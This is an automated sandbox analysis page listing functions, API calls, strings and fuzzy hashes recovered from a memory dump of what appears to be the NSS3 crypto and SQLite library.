%04d, xrefs: 6C59407B
%lld, xrefs: 6C593FB2

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: 0543bbd75aef3eff62525485ee1ab28a23f6f61ab8af430c55fd9b5096647241
Instruction ID: c080f5765a5865ec15aa4b80a7f5fe7859a976d15f88767c0982546c078fbcf8
Opcode Fuzzy Hash: 0543bbd75aef3eff62525485ee1ab28a23f6f61ab8af430c55fd9b5096647241
Instruction Fuzzy Hash: 55F12271A087809FD715CF38CC80A6BB7F6AFC6308F148A6DF49A97651E734D8858B46

Function 6C59EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C59EF63

Part of subcall function 6C5A87D0: PORT_NewArena_Util.NSS3(00000800,6C59EF74,00000000), ref: 6C5A87E8
Part of subcall function 6C5A87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C59EF74,00000000), ref: 6C5A87FD
Part of subcall function 6C5A87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C5A884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C59F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C59F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C59F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C59F374
PL_strcasecmp.NSS3(6C6E2FD4,?), ref: 6C59F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C59F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C59F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C59F67D
CERT_DestroyName.NSS3(?), ref: 6C59F68B

Part of subcall function 6C5A8320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C5A8338
Part of subcall function 6C5A8320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C5A8364
Part of subcall function 6C5A8320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C5A838E
Part of subcall function 6C5A8320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5A83A5
Part of subcall function 6C5A8320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A83E3

Part of subcall function 6C5A84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C5A84D9
Part of subcall function 6C5A84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C5A8528

Part of subcall function 6C5A8900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C5A8955

Strings

oid., xrefs: 6C59F2CF
", xrefs: 6C59F21B
*, xrefs: 6C59F3C6

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 0b44f056a4be2a6139e390fd3d9e9c5c830c8c9dfbf368bccd8b92fe2100a9d7
Instruction ID: f9d1a6fd7286f3e6a523ef250c9a931bbf901576d6bed807dd13a2c724759390
Opcode Fuzzy Hash: 0b44f056a4be2a6139e390fd3d9e9c5c830c8c9dfbf368bccd8b92fe2100a9d7
Instruction Fuzzy Hash: 3E2236716083818BD714CE29DC9036AB7E6ABC531CF184BAEF49987B91E7359C45CB83

Function 6C541C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C541D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C541EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C541FB7

Strings

SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C541F83
sqlite_temp_master, xrefs: 6C541C5C
abort due to ROLLBACK, xrefs: 6C542223
another row available, xrefs: 6C542287
unsupported file format, xrefs: 6C542188
attached databases must use the same text encoding as main database, xrefs: 6C5420CA
no more rows available, xrefs: 6C542264
sqlite_master, xrefs: 6C541C61
table, xrefs: 6C541C8B
unknown error, xrefs: 6C542291

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: 40e88a868aef6974a325a0c42c7efdb1a27fbd3056f88bab843a9532bd6bacb9
Instruction ID: 8e8bd3bf88c820cd0e7a19bfb5152a6a8878ea0561b4c4f771fdecc4dc8b895b
Opcode Fuzzy Hash: 40e88a868aef6974a325a0c42c7efdb1a27fbd3056f88bab843a9532bd6bacb9
Instruction Fuzzy Hash: 1412CD706083519FD704CF19C884A5ABBF2BF85318F18C96DE8898BB52D771EC56CB92

Function 6C565F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON

Download Yara Rule

Strings

-, xrefs: 6C566228
ON clause references tables to its right, xrefs: 6C566BEC
u, xrefs: 6C5681DA
BINARY, xrefs: 6C568708, 6C568737, 6C5687B8
sub-select returns %d columns - expected %d, xrefs: 6C56805F
NOCASE, xrefs: 6C568703
-, xrefs: 6C5662F9
2, xrefs: 6C5665B4

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
API String ID: 0-3593521594
Opcode ID: 3fe983f264cfc11a6a8f9a6daf9417eb76773c04552acd3e8700af72208ba0a9
Instruction ID: b602a4dd67f2f0dfeaa69c4972fd61a075b94f451d7c7ebe291cbe767e1c1bd1
Opcode Fuzzy Hash: 3fe983f264cfc11a6a8f9a6daf9417eb76773c04552acd3e8700af72208ba0a9
Instruction Fuzzy Hash: 9A4364746083419FD304CF26C890B5AB7E2BFC9358F148A5DE8958BB66D731EC46CB92

Function 6C60EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C60C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C60DAE2,?), ref: 6C60C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C60F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C60F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C60F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C60F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C6D218C), ref: 6C60F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C60F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C60F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C60F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C60F210

Part of subcall function 6C5B52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C60F1E9,?,00000000,?,?), ref: 6C5B52F5
Part of subcall function 6C5B52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C5B530F
Part of subcall function 6C5B52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C5B5326
Part of subcall function 6C5B52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C60F1E9,?,00000000,?,?), ref: 6C5B5340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C60F227

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C60F23E

Part of subcall function 6C5FBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C5AE708,00000000,00000000,00000004,00000000), ref: 6C5FBE6A
Part of subcall function 6C5FBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5B04DC,?), ref: 6C5FBE7E
Part of subcall function 6C5FBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5FBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C60F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C60F3A8

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C60F3B3

Part of subcall function 6C5B2D20: PK11_DestroyObject.NSS3(?,?), ref: 6C5B2D3C
Part of subcall function 6C5B2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C5B2D5F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 2183edddb30c82c963286b28c0cfe677f8e8140412c028d0ac10876c31821453
Instruction ID: 5cedec4a4ada24e78d4339960c3f5f8623a69dfaf822fdc026f0fc5d157172c3
Opcode Fuzzy Hash: 2183edddb30c82c963286b28c0cfe677f8e8140412c028d0ac10876c31821453
Instruction Fuzzy Hash: EDD1A0B5F006059FDB08CF99D980A9EB7F5EF88318F148029DA15B7711EB31E806CB99

Function 6C63DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C617FFA,00000000,?,6C6423B9,00000002,00000000,?,6C617FFA,00000002), ref: 6C63DE33

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

Part of subcall function 6C63D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C63DE74,6C617FFA,00000002,?,?,?,?,?,00000000,6C617FFA,00000000,?,6C6423B9,00000002), ref: 6C63D008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C617FFA,00000000,?,6C6423B9,00000002,00000000,?,6C617FFA,00000002), ref: 6C63DE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6C63DEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C63E069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C63E121
PK11_FreeSymKey.NSS3(?), ref: 6C63E14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C63E195
PR_GetCurrentThread.NSS3 ref: 6C63E1FC

Part of subcall function 6C632460: PR_SetError.NSS3(FFFFE005,00000000,6C6D7379,00000002,?), ref: 6C632493

Strings

application data, xrefs: 6C63DFE0
key, xrefs: 6C63E046
handshake data, xrefs: 6C63DFF7
early application data, xrefs: 6C63DFC9

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: ecf189566ddae61394a222435dddee2a842f516a306e9e65d301029d2c5e32c9
Instruction ID: 2fcf495268ebbb176f30dbcba2c1ecb99de99c7a811cf18c5c63992254053c65
Opcode Fuzzy Hash: ecf189566ddae61394a222435dddee2a842f516a306e9e65d301029d2c5e32c9
Instruction Fuzzy Hash: 71C1E571A002259BDB04CF65CC80BEAB7B5FF45308F046129E9099BB91E735ED54CBAA

Function 6C52ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C52EF98

Strings

%s at line %d of [%.10s], xrefs: 6C52F492
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52F483
database corruption, xrefs: 6C52F48D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 17deaece61084c2bfb5ecf51b3f11b93377a8d37a4992f0b3116757d527f764f
Instruction ID: 7a8839665b31325c4fa8360a2c652840cd20be22eabca4396f323d81c63c10b7
Opcode Fuzzy Hash: 17deaece61084c2bfb5ecf51b3f11b93377a8d37a4992f0b3116757d527f764f
Instruction Fuzzy Hash: 9A62EE70A042558FEB04CF24DC80B9ABBF1AF45318F18469DD8466BBD2D779EC86CB90

Function 6C5CFC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C5CFD06

Part of subcall function 6C5CF670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C5CF696
Part of subcall function 6C5CF670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C5CF789
Part of subcall function 6C5CF670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C5CF796
Part of subcall function 6C5CF670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C5CF79F
Part of subcall function 6C5CF670: SECITEM_DupItem_Util.NSS3 ref: 6C5CF7F0

Part of subcall function 6C5F3440: PK11_GetAllTokens.NSS3 ref: 6C5F3481
Part of subcall function 6C5F3440: PR_SetError.NSS3(00000000,00000000), ref: 6C5F34A3
Part of subcall function 6C5F3440: TlsGetValue.KERNEL32 ref: 6C5F352E
Part of subcall function 6C5F3440: EnterCriticalSection.KERNEL32(?), ref: 6C5F3542
Part of subcall function 6C5F3440: PR_Unlock.NSS3(?), ref: 6C5F355B

SECITEM_DupItem_Util.NSS3(?), ref: 6C5CFDAD

Part of subcall function 6C5FFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C5A9003,?), ref: 6C5FFD91
Part of subcall function 6C5FFD80: PORT_Alloc_Util.NSS3(A4686C60,?), ref: 6C5FFDA2
Part of subcall function 6C5FFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C60,?,?), ref: 6C5FFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C5CFE00

Part of subcall function 6C5FFD80: free.MOZGLUE(00000000,?,?), ref: 6C5FFDD1

Part of subcall function 6C5EE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5EE5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CFEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6C5CFEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C5CFED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C5CFF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C5CFF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C5CFF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C5CFFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C5D0007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C5D0029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C5D0044

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 802af0e27ec8529a183102b878d5224775349a09bdbaeaf6024d4654d3a6ccd9
Instruction ID: c7a4dfdee0a4e721295974c2303df0d6d322c68f2a09fb8a68e8a56d38bd9f38
Opcode Fuzzy Hash: 802af0e27ec8529a183102b878d5224775349a09bdbaeaf6024d4654d3a6ccd9
Instruction Fuzzy Hash: 15B192B1604301AFE704CF69CC81A6BB7E5FF88308F558A1DE99997A41E770E944CB92

Function 6C5C7D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C5C7DDC

Part of subcall function 6C6007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5A8298,?,?,?,6C59FCE5,?), ref: 6C6007BF
Part of subcall function 6C6007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6007E6
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C60081B
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C600825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5C7DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C5C7F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C5C7F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C5C7F98
PK11_FreeSymKey.NSS3(?), ref: 6C5C7FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5C7FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C5C8000

Part of subcall function 6C5E9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C5C7F0C,?,00000000,00000000,00000000,?), ref: 6C5E943B
Part of subcall function 6C5E9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C5E946B
Part of subcall function 6C5E9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C5E9546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5C8110
PK11_FreeSymKey.NSS3(00000000), ref: 6C5C811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C5C822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C5C823C

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: d26d124ccb0a928d9f1358ee2429094df3df91536185291aa0865b752a44e1cc
Instruction ID: 4a79b825a71deeea86d776dad6e0fe2508c6e5ce1b1a95158a5cd1b62b90903c
Opcode Fuzzy Hash: d26d124ccb0a928d9f1358ee2429094df3df91536185291aa0865b752a44e1cc
Instruction Fuzzy Hash: 33C163B1E00259DBDB21CF64CC44BDAB7B8AF05348F0085E9E91DA6A41E7319E85CF52

Function 6C53AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C65CF46,?,6C52CDBD,?,6C65BF31,?,?,?,?,?,?,?), ref: 6C53B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C65CF46,?,6C52CDBD,?,6C65BF31), ref: 6C53B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C65CF46,?,6C52CDBD,?,6C65BF31), ref: 6C53B0A2
CloseHandle.KERNEL32(?,?,6C65CF46,?,6C52CDBD,?,6C65BF31,?,?,?,?,?,?,?,?,?), ref: 6C53B100
sqlite3_free.NSS3(?,?,00000002,?,6C65CF46,?,6C52CDBD,?,6C65BF31,?,?,?,?,?,?,?), ref: 6C53B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C65CF46,?,6C52CDBD,?,6C65BF31), ref: 6C53B12D

Part of subcall function 6C529EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C53C6FD,?,?,?,?,6C58F965,00000000), ref: 6C529F0E
Part of subcall function 6C529EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C58F965,00000000), ref: 6C529F5D

Strings

`kl, xrefs: 6C53B0DF

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `kl
API String ID: 3155957115-1495814759
Opcode ID: 109443c3eb86929bb7a25f0aedfe2f41f8d5debf7202f51ea7619d057cf59555
Instruction ID: 6cb9d159331e53ca40ee6647036d37d4518eaaee9702b450b8d3b7920d9ed17f
Opcode Fuzzy Hash: 109443c3eb86929bb7a25f0aedfe2f41f8d5debf7202f51ea7619d057cf59555
Instruction Fuzzy Hash: 6F91ECB0A006158FEB04DF65DC84B6BB7B2BF46308F145A2DE41A97B50FB35E844CB91

Function 6C5D0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C5D0F8D
